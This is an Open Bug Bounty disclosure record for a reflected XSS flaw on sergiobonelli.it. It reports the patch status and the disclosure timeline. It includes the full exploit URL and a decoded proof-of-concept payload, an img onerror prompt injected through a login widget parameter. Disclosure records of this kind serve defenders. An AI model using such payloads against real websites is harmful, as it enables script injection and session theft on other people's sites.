sergiobonelli.it XSS vulnerability

2016-05-09T17:27:00
ID OBB:150858
Type openbugbounty
Reporter Oc3f
Modified 2017-11-24T10:58:00

Description

Vulnerable URL:
http://www.sergiobonelli.it/widget/head/login.jsp?password_dimenticata_testo=%22%3E%22%3E%3Cimg%20src=x%20onerror=prompt%28/OPENBUGBOUNTY/%29%3E&x=0&y=0&idcanale=9&elementsOrder_logged=username%2Cmodifica_dati%2Clogout&tipo_layout=header&classname=head_login+head_login_casa_editrice&elementsOrder_user_login=username%2Cpassword%2Csubmit%2Cuser_login%2Clogin_google%2Clogin_facebook&registrati_testo=register&recupera_password_invia_testo=proceed&elementsOrder=apri_login%2Cregistrati%2Cuser_login&occhiello_recupera_password=Insert+your+registration+e-mail+to+receive+a+link+to+change+your+password&q=who+is+tex&message_error=Error+logging%3A+username+or+password+incorrect%2C+or+the+account+has+not+been+activated.&title_error=User+not+found&torna_login_testo=back+to+login&ajax=true&id_canale_ajax=9

Injected parameter: password_dimenticata_testo. URL-decoded, its value is "><"><img src=x onerror=prompt(/OPENBUGBOUNTY/)>, i.e. a reflected XSS payload that first closes the attribute and tag it is reflected into and then injects an img element whose onerror handler runs script.

Details:

Description| Value
---|---
Patched:| Yes, at 24.11.2017
Latest check for patch:| 24.11.2017 10:58 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 132544
VIP website status:| No
SSL connection check (sergiobonelli.it):| Grade F

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 9 May, 2016 17:27 GMT
Generic security notifications sent to website owner| 9 May, 2016 17:30 GMT
Vulnerability details disclosed by researcher| 1 August, 2016 18:12 GMT
Vulnerability patched by the website owner| 24 November, 2017 10:58 GMT